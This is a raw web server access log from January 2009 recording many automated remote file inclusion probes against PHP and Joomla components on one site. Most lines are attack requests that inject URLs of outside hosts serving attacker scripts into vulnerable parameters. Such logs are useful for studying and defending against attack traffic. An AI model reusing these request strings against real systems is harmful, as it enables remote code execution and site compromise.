216.246.20.140 - - [04/Jan/2009:08:50:23 -0800] "GET /about.php?inc_dir=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.20.140 - - [04/Jan/2009:08:50:23 -0800] "GET /logs/access_080903.log//about.php?inc_dir=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:50:31 -0800] "GET /logs/access_080724.log//shoutbox/expanded.php?conf=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:50:31 -0800] "GET /logs/access_080925.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:50:31 -0800] "GET /shoutbox/expanded.php?conf=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:50:32 -0800] "GET /logs//shoutbox/expanded.php?conf=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:50:38 -0800] "GET /myPHPCalendar/admin.php?cal_dir=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:50:40 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:50:41 -0800] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:50:43 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:50:44 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95155 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:50:48 -0800] "GET /logs/access_080925.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:50:56 -0800] "GET /logs//myPHPCalendar/admin.php?cal_dir=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:50:56 -0800] "GET /myPHPCalendar/admin.php?cal_dir=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:50:58 -0800] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:50:58 -0800] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:50:58 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:50:59 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.0" 200 95104 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:50:59 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95155 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:50:59 -0800] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:50:59 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:51:00 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95139 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:51:07 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:51:17 -0800] "GET /logs/access_080512.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:51:41 -0800] "GET /logs/access_080925.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:51:42 -0800] "GET /logs/access_080925.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:51:45 -0800] "GET /logs/access_080925.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:51:47 -0800] "GET /shoutbox/expanded.php?conf=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:08:51:48 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:08:51:51 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:08:51:51 -0800] "GET /logs/access_080228.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:51:55 -0800] "GET /logs//shoutbox/expanded.php?conf=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:51:56 -0800] "GET /shoutbox/expanded.php?conf=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.162.154 - - [04/Jan/2009:08:52:15 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://www.colorteck.com/newsletter/canal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.162.154 - - [04/Jan/2009:08:52:15 -0800] "GET /SQuery/lib/gore.php?libpath=http://www.colorteck.com/newsletter/canal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:52:41 -0800] "GET /logs/access_080121.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:52:43 -0800] "GET /logs/access_081117.log//shoutbox/expanded.php?conf=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:52:49 -0800] "GET /logs/access_080629.log%20/cmpro_header.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:52:55 -0800] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:52:55 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:52:56 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:53:13 -0800] "GET /logs/access_080521.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:53:21 -0800] "GET /logs/access_080601.log/index2.php?table=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:53:34 -0800] "GET /logs/access_080925.log%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:53:35 -0800] "GET /logs/access_080325.log///codebb/lang_select?phpbb_root_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:53:36 -0800] "GET //codebb/lang_select?phpbb_root_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:53:37 -0800] "GET /logs///codebb/lang_select?phpbb_root_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:53:47 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.projectsuper.ru/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:53:47 -0800] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.projectsuper.ru/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:53:48 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.projectsuper.ru/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:53:50 -0800] "GET /logs/access_080521.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.projectsuper.ru/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:08:54:21 -0800] "GET /logs/phphtml.php?htmlclass_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:08:54:21 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:08:54:22 -0800] "GET /phphtml.php?htmlclass_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:08:54:22 -0800] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:08:54:26 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 200 95197 "-" "libwww-perl/5.79" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:54:47 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:54:48 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:54:49 -0800] "GET /index.php?DOCUMENT_ROOT=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 200 95062 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:54:50 -0800] "GET /index.php?DOCUMENT_ROOT=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 200 95046 "-" "libwww-perl/5.808" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:08:54:58 -0800] "GET /shoutbox/expanded.php?conf=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:08:54:58 -0800] "GET /logs/access_080724.log//shoutbox/expanded.php?conf=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:08:54:58 -0800] "GET /logs//shoutbox/expanded.php?conf=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:08:54:58 -0800] "GET /logs/access_081117.log//shoutbox/expanded.php?conf=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:08:55:06 -0800] "GET /logs/access_080523.log/inc/cmses/aedatingCMS.php?dir[inc]=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:08:55:06 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:08:55:06 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:08:55:08 -0800] "GET /logs/access_080613.log/inc/cmses/aedatingCMS.php?dir[inc]=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:08:55:25 -0800] "GET /logs/access_081117.log%20//shoutbox/expanded.php?conf=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:55:37 -0800] "GET /logs/access_080708.log///codebb/lang_select?phpbb_root_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:08:55:48 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:08:55:49 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:08:55:51 -0800] "GET /logs/access_080228.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:55:55 -0800] "GET /logs///codebb/lang_select?phpbb_root_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:55:55 -0800] "GET //codebb/lang_select?phpbb_root_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:08:56:55 -0800] "GET /?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94732 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
193.171.110.146 - - [04/Jan/2009:08:57:18 -0800] "GET /logs/access_080516.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.170.11.100 - - [04/Jan/2009:08:57:23 -0800] "GET /logs/access_080227.log///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [04/Jan/2009:08:57:24 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [04/Jan/2009:08:57:24 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.101.68.240 - - [04/Jan/2009:08:57:37 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://amixblack.110mb.com/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:57:52 -0800] "GET /logs/access_080912.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:57:52 -0800] "GET /logs//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:57:52 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.154.16.128 - - [04/Jan/2009:08:57:59 -0800] "GET /logs/access_081111.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:58:00 -0800] "GET /logs/access_080321.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:58:06 -0800] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
200.198.92.34 - - [04/Jan/2009:08:58:26 -0800] "GET /logs/access_080714.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
200.198.92.34 - - [04/Jan/2009:08:58:26 -0800] "GET /logs/access_080404.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:58:36 -0800] "GET /logs/access_080624.log///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:58:36 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:58:36 -0800] "GET /logs///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.21.71.133 - - [04/Jan/2009:08:58:41 -0800] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [04/Jan/2009:08:58:41 -0800] "GET /logs/access_080513.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [04/Jan/2009:08:58:41 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [04/Jan/2009:08:58:41 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.84.243.81 - - [04/Jan/2009:08:58:57 -0800] "GET /logs/access_081111.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:58:58 -0800] "GET /logs/access_071224.log//library/lib.php?root=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:58:58 -0800] "GET /logs//library/lib.php?root=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.84.243.81 - - [04/Jan/2009:08:58:58 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:58:58 -0800] "GET /library/lib.php?root=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:58:58 -0800] "GET /logs/access_080512.log//library/lib.php?root=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.84.243.81 - - [04/Jan/2009:08:58:58 -0800] "GET /logs//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
